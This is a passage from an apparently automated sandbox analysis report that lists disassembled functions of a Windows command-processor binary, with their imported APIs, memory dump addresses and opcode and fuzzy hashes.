                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                      • String ID: %04X-%04X$:
                                                      • API String ID: 930873262-1938371929
                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                      • Instruction ID: e46f17493ce8f2359f4980bac5d54771cc69800845f5c769ce2c0579dff52851
                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                      • Instruction Fuzzy Hash: AA416421A08A4292EB24EB60E4523BAE360FB85755FC18237E58E426D5DFBCD544C762
                                                      Function 00007FF7E1DC36EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 3249344982-2616576482
                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                      • Instruction ID: aa4ed4db75d2f44ac459449a037098802e5269b963e0e4e87f723f36d13b758d
                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                      • Instruction Fuzzy Hash: 9741CF72A18B8196E710DF12A841339FBA0FB89BC5F848636DA4E47794CFBCD014CB51
                                                      Function 00007FF7E1DC6A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A73
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A91
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AB0
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AE3
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6B01
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$iswdigit
                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                      • API String ID: 2770779731-632268628
                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                      • Instruction ID: beadcbb0409da8bb26386bf7f19b3b267d8472ced86939c05d6d2d7f036e2e87
                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                      • Instruction Fuzzy Hash: D0313B22A08A5685EB54EF02E491379B7E1FB49F85B85C436DA5E83364EF7CE404C362
                                                      Function 00007FF7E1DC1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1673
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC168D
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1757
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC176E
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1788
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC179C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Alloc$Size
                                                      • String ID:
                                                      • API String ID: 3586862581-0
                                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                      • Instruction ID: 4a002404111aaec6dd31e9545b9aa29a4e0cd3b0f55e56810cc0d3022b8664cd
                                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                      • Instruction Fuzzy Hash: 52918D61A09A56D1EF14EB15E842379B6A1FF48B80F998933CA4D033E4DFBCE451C7A1
                                                      Function 00007FF7E1DC86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                      • String ID:
                                                      • API String ID: 1313749407-0
                                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                      • Instruction ID: 3d531663272f15aa2a167deb42ed56b0d1ebfc48d506e8435f32f78f1f9ee04f
                                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                      • Instruction Fuzzy Hash: 2551C622A0868292FF14FB15A406779E691FF49B90FC94636DD1E077D0EFBCE491C2A1
                                                      Function 00007FF7E1DDBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                      • String ID: KEYS$LIST$OFF
                                                      • API String ID: 411561164-4129271751
                                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction ID: 15e4f702a6037c5ad8a72fc2028f27eaf1e032af54674989ea782079be31238f
                                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction Fuzzy Hash: D9212121E08A0291F718FB25A883379E661FB85795FC0D737C61E872E5DEFCA4448662
                                                      Function 00007FF7E1DBE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 3849470556-1994581435
                                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                      • Instruction ID: ef0f9b7468addac1b581678e2efafe17ec889b006855f62f62317c29478df060
                                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                      • Instruction Fuzzy Hash: A0517B31A0864295EB24EF16E446779B7A4FF44B55F848537DA4E43390DFBCE880C362
                                                      Function 00007FF7E1DC5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$CurrentDirectorytowupper
                                                      • String ID:
                                                      • API String ID: 1403193329-0
                                                      • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                      • Instruction ID: 0191cd607eac79fb79357e27efade4a43282e9af67022759020de1ac636cb0e9
                                                      • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                      • Instruction Fuzzy Hash: 4651C226A0569285EB24EF20D8027F9B7B0FF48B48F858936CA1D47394EFBCE545C361
                                                      Function 00007FF7E1DB2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$_setjmp
                                                      • String ID:
                                                      • API String ID: 3883041866-0
                                                      • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                      • Instruction ID: edd92022448a722bfc72fbebdf1e760168878d522278d93026a3710a40b7b14e
                                                      • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                      • Instruction Fuzzy Hash: BD51A632A08BC69AEB61DF21D8413E9B7A4FB49748F804136DA4D4BB48DF7CE644C711
                                                      Function 00007FF7E1DB65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                      • String ID:
                                                      • API String ID: 3114114779-0
                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction ID: 08ba840b93f9f81222026dcd9b03dc040855f0aa22c75cfc6daf96a6a06bd750
                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction Fuzzy Hash: 52416832A05B429AEB00EF75D4413ACB7A5FB88748F914036EE0E93B94DF78E406C761
                                                      Function 00007FF7E1DC32E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC33A8: iswspace.MSVCRT(?,?,00000000,00007FF7E1DDD6EE,?,?,?,00007FF7E1DD0632), ref: 00007FF7E1DC33C0
                                                      • iswspace.MSVCRT(?,?,?,00007FF7E1DC32A4), ref: 00007FF7E1DC331C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: off
                                                      • API String ID: 2389812497-733764931
                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction ID: 3cd32d028c9ccdaeffb85a33dfb0399a2746a29ffc38557cae928e3ff8438fc2
                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction Fuzzy Hash: 8A214C21F0C652A1FB64FB159552379FAA0EF85B90FD88436D90E86784DEBCE440C6A3
                                                      Function 00007FF7E1DD9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: %s=%s$DPATH$PATH
                                                      • API String ID: 3731854180-3148396303
                                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction ID: eea2dd9ee1255c07c1855c5781151e49d3c93d7cc779e9afd222aee6b181fda1
                                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction Fuzzy Hash: D8219215F0965680EF59FB55E442379A360AF84B80FC89237D90E83395DFBDE440C3A2
                                                      Function 00007FF7E1DB6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC3D0C
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D2F
                                                        • Part of subcall function 00007FF7E1DC3C24: iswalpha.MSVCRT ref: 00007FF7E1DC3D4F
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D75
                                                        • Part of subcall function 00007FF7E1DC3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3DBF
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6ABF
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6AD3
                                                        • Part of subcall function 00007FF7E1DB6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B8B
                                                        • Part of subcall function 00007FF7E1DB6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B97
                                                        • Part of subcall function 00007FF7E1DB6B84: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6BAF
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B39
                                                        • Part of subcall function 00007FF7E1DB6B30: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B4D
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B59
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6B03
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B17
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                      • String ID:
                                                      • API String ID: 3512109576-0
                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction ID: 17d18de5e14ca10350adfa32aa2996a0f90b2cd1ac54c7dd49fc07f285246e8a
                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction Fuzzy Hash: 8D21BF62A08A8295EF05FF2594023B8BBA0EB59B45F988033C91E83351DF7C9445C372
                                                      Function 00007FF7E1DBB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6D0
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6E7
